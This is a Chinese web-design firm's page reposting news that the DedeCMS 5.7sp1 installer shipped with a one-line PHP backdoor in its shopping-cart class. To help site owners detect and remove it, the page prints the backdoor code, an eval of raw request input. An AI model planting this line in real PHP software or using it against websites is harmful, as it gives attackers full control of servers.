建站专家,专业网站建设 为客户创造互联网时代新价值
网站没有访问量?网站没有排名?创意网络来帮您!
专注于推广营销型企业网站建设,让您的网站“活”起来!

在线咨询
经济型网站1500元 标准型网站2500元 商务型网站3500元 定制型网站
行业资讯 技术支持 编程技术 优化技术 建设文摘 营销技术 建设帮助
国内虚拟主机 香港虚拟主机 美国虚拟主机
服务项目
企业网站解决方案企业网站解决方案
打造企业品牌形象,建立企业网络平台,提供全方位的企业网站建设一条龙服务。
企业网站优化推广方案企业网站优化推广方案
专业的SEO服务,网站优化,排名提升,为企业创造更多的商机。
域名主机租用服务域名主机租用服务
稳定的DNS服务器,24小时不间断监控,为您保证稳定、高速的网站运作环境。
搜索引擎化化SEO
我要新建网站
番禺网站建设为您建立一个能不断为您带来新客户的网站[了解详情]

改版我的网站
网站改版可以带来优质的用户体验,增加网站优化细节
[了解详情]
织梦CMS漏洞爆光 网站建设公司忙更新
    番禺网站建设:近日到处传遍织梦内容管理系统(DedeCMS)遭乌云漏洞平台曝光称,DedeCMS 5.7sp1官方安装包被黑客植入后门。经360安全检测平台检测,该后门确实曾一度出现在织梦官网版本中。所以,360公司于当天紧急推出了DedeCMS后门检测服务,并已对大批中招网站发出邮件报警。

   360网站安全检测平台服务网址:http://webscan.360.cn


图1:DedeCms被植入的后门代码

   据了解,DedeCMS被很多无自主开发后台能力的网站建设公司使用,广泛应用于很多企业网站、政府网站、高校网站及个人网站上,是国内用户量最大的PHP类CMS系统。番禺网站建设分析发现,此次DedeCMS曝出的后门名为“一句话后门”,其恶意代码存在于DedeCMS购物车类文件中,凡是调用该购物车类的文件均会触发后门,从而导致整个网站甚至服务器遭黑客进一步控制。

   360建议,使用DedeCMS的网站站长应立刻检测include/shopcar.class.php文件中是否存在后门代码“@eval(file_get_contents('php://input'));”,如存在应将其删除,如不存在则证明没有该“一句话后门”。

   作为开源软件,DedeCMS此次曝出后门并非个例。因为在国际上,Linux等多款著名的开源软件也曾遭黑客植入后门。不过,乌云漏洞平台公开的织梦官方邮件显示,织梦开发团队否认了产品曾被植入后门,但其官网上的DedeCMS版本在3月21日中午悄然进行了修改。


图2:测试验证PHP代码可被DedeCMS后门执行
    此次事件对于于小型企业的网站开发影响很大,众多了解此系统的网站建设公司也忙于对自己系统的升级与改进,对于这些开源程序,代码在安全性上面受到互联网的监控,程序爆光面广,一旦被细心的黑客发现漏洞所在,所带来的问题将是广泛的。所以,对于此类CMS系统,番禺网站建设建议使用自主开发的后台管理系统,当然,并且所有网站建设公司有此能力。

编辑:番禺网站建设 http://www.py162.com
资料来源:创意设计工作室 http://www.py162.com,转载请注明出处!
  • 相关文章
  • ·您的微博实名了吗?四大微博正式启用实名制
  • ·网站推广不得法,散布遥言囚两年
  • ·番禺网站建设:全方位对比国内域名注册商
  • ·淘宝商城更名为“天猫” 购买tianmao.com域名
  • ·支付宝2月8日起关闭信用卡充值服务
  • ·什么样的网站容易被黑?下一个会是你的网站吗?
  • ·新网域名服务器频频故障引发大规模网站无法访问
  • ·步入2012年回顾2011年seo的大事
  • ·从网络信息泄密分析用户的习惯
  • ·技术漏洞致广东444万余条出境申请信息泄露
  • ·万网获反钓鱼网站联盟优秀支持单位
  • ·苹果微软之间的战场转向手机市场
  • 网友评论
    用户名: